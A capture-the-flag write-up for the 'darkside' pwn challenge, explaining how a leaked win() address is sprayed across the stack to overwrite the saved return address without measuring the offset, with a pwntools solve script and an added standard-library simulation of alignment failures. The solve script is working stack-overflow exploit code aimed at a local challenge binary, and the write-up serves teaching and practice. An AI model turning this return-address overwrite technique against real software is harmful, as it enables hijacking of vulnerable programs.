Tags: pwn 

Rating: 5.0

The binary leaks the address of the win() function, but the writeup never works out the exact offset at which the overflow reaches the saved return address. Instead of measuring it, the payload sprays the packed 8-byte address of win() across the stack: every aligned slot the overflow covers, including the one holding the saved RIP, ends up containing win(), so the vulnerable function returns straight into it. The shortcut relies on two things: the overflow must be long enough to reach the return address, and the start of the buffer must be 8-byte aligned relative to that slot, otherwise the repeated pointer lands misaligned. The payload also contains NUL bytes, so the input routine must not stop at NUL (read() and gets() do not; strcpy-style copies would).

```python
from pwn import *

p = process('./darkside')

# The first line the binary prints ends with the leaked win() address
# (e.g. "... 0x401136"). Take the last whitespace-separated token and
# parse it as hex.
data = p.recvline()
win_addr = int(data.split()[-1], 16)
log.info(f"win() @ {win_addr:#x}")

# No offset to the saved return address is known, so spray the packed
# address across the stack: whichever 8-byte slot holds RIP gets win().
payload = p64(win_addr) * 100
p.sendline(payload)
p.interactive()
```
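To see why the spray works without an offset, and when it silently does not, here is an added example that is not part of the original writeup. It models the overflow as a copy of the payload starting at the buffer and reads back the 8-byte slot at an arbitrary distance from the buffer start. The leak line and the win() address are constructed stand-ins, and the helper names are my own. Unlike the solve script above, it uses only the standard library (struct.pack replaces pwntools' p64), so it runs without a target binary.

```python
import struct

# Constructed stand-in for the line the binary prints; 0x401136 is an
# assumed address, not the real one.
LEAK_LINE = b"win is at 0x401136\n"


def parse_leak(line: bytes) -> int:
    """Parse the last whitespace-separated token of a leak line as hex."""
    return int(line.split()[-1], 16)


def spray(addr: int, count: int) -> bytes:
    """Repeat the little-endian 8-byte address `count` times (same as p64(addr) * count)."""
    return struct.pack("<Q", addr) * count


def slot_at(payload: bytes, offset: int) -> int:
    """Value that writing `payload` from the buffer start leaves in the
    8-byte stack slot located `offset` bytes past the buffer."""
    return struct.unpack("<Q", payload[offset:offset + 8])[0]


def spray_hits(addr: int, payload: bytes, offset: int) -> bool:
    """True if the slot at `offset` (e.g. the saved RIP) ends up holding `addr`.

    Fails when the payload is too short to reach the slot, or when the
    slot is not 8-byte aligned relative to the buffer start, because the
    repeated pointer is then read back straddling two copies.
    """
    if offset + 8 > len(payload):
        return False
    return slot_at(payload, offset) == addr


def demo() -> dict:
    addr = parse_leak(LEAK_LINE)
    payload = spray(addr, 100)          # 800 bytes, as in the solve script
    return {
        "aligned_72":   spray_hits(addr, payload, 72),   # typical aligned RIP slot
        "misaligned_76": spray_hits(addr, payload, 76),  # 4 bytes off: garbage value
        "too_far_800":  spray_hits(addr, payload, 800),  # overflow never reaches it
        "misaligned_value": slot_at(payload, 4),         # what a misaligned read sees
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(f"{k}: {v:#x}" if isinstance(v, int) and not isinstance(v, bool) else f"{k}: {v}")
```

The misaligned read returns 0x0040113600000000, not 0x401136: the low half of one copy and the high half of the next. That is the failure mode to check for if a spray that "should" work segfaults; the fix is either to pad the front of the payload to restore alignment or to measure the real offset (with cyclic()/cyclic_find()) instead of spraying.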

Original writeup (https://github.com/tj-oconnor/spaceheroes_ctf/blob/main/pwn/pwn-darkside/solve/pwn-solve.py).